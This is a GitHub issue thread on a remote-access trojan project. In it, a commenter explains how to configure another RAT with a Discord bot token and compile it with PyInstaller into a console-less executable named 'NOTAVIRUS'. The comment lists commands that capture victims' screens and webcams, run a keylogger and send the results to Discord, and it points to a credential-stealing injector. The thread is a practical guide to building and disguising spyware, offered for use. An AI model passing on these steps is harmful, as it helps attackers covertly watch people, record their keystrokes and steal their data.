### ISSUE TITLE
How to disconnect the user from rat other then going into tskmgr and disabling also that should be a feature if u want to disable tskmgr or not same with enabling it

### ISSUE THREAD

**Issue by BridgeKeeper1** [DamagingRose/Rose-RAT#6]

**Comment by Gumbobrot** [comment]
ye we got a better rat rn called knight rat, this is the [source](https://github.com/DamagingRose/Rose-Injector/blob/main/components/source/knight_rat.py), just change the config to this and fill in the fields:
```py
btoken = "PUT YOUR BOT TOKEN INTO THESE BRACKETS"
prefix = "PREFIX FOR THE COMMANDS, LEAVE BLANK IF YOU DONT WANT TO USE A PREFIX"
userid = "PUT YOUR OWN USERID INTO THIS IF YOU WANT TO BE PINGED"
channelid = "CHANNELDID THE BOT SENDS THE NEW CONNECTION MESSAGE TO"
```

after you have did that run the following commands into a cmd terminal in the folder where the python file is located
`python -m pip install -U pyinstaller`
if that command does not work, just use this one:
`pip install -U pyinstaller`
if it still doesn't work, please check for python in your path, pip and python generally correctly installed
now run the final command to compile the python file into an EXE:
`pyinstaller --onefile main.py --noconsole -n NOTAVIRUS`
replace the main.py with the filename of the rats source like knight_rat.py

this process could take a few minutes and when you get the finish message the final exe file will be in the dist directory called NOTAVIRUS.exe

hope i could help you! check the commands of that tool with [prefix]help
this rat got some more options and a quit command, but also just something too play and not really a thing that gets credentials, for that you may use [Rose-Injector](https://github.com/DamagingRose/Rose-Injector)

but i am working on knight to bring more features to it that are really useful & funny 😀

(to make the file run every time at startup you will need to use the startup command before
the client system may confuse you too, everytime you run a command you need to include all or the clientid like:)
`screenshot all` // collects a screenshot of all victims desktop and sends it to your discord channel where you executed the command from
`webcam 952845` // collects a webcam picture of the victim with the clientid 952845 and sends the image to discord
`keylogger 142140 10` // starts the keylogger and writes all keys pressed into one file, dumps it to your channel after 10 seconds and deletes the keylogs file


lmk if you experience any issues. :)
